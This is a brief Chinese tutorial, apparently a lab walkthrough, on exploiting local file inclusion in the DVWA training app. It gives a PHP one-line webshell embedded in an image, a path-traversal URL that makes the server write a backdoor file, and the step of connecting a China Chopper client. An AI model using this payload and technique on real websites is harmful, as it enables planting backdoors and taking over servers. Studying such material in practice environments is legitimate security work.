大数据中本地文件包含漏洞是怎样的,针对这个问题,这篇文章详细介绍了相对应的分析和解答,希望可以帮助更多想解决这个问题的小伙伴找到更简单易行的方法。
一、本地文件包含漏洞:
环境:DVWA,low级别
1、制作一句话图片木马
第一种方法:
windows命令
copy 1.jpg/b+1.php 2.jpg
第二种方法:
将照片拖入edjpgcom软件,添加下面这句话
<?fputs(fopen("1.php","w"),'<?php eval($_POST[cmd]);?>')?>
2、上传图片木马文件
3、选择文件包含页面
4、执行文件包含并生成后门
192.168.152.188/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/1.jpg
5、在/var/www/dvwa/vulnerabilities/fi目录生成了1.php
6、菜刀链接
二、环境:DVWA,medium级别
同low级别
关于大数据中本地文件包含漏洞是怎样的问题的解答就分享到这里了,希望以上内容可以对大家有一定的帮助,如果你还有很多疑惑没有解开,可以关注亿速云行业资讯频道了解更多相关知识。
免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。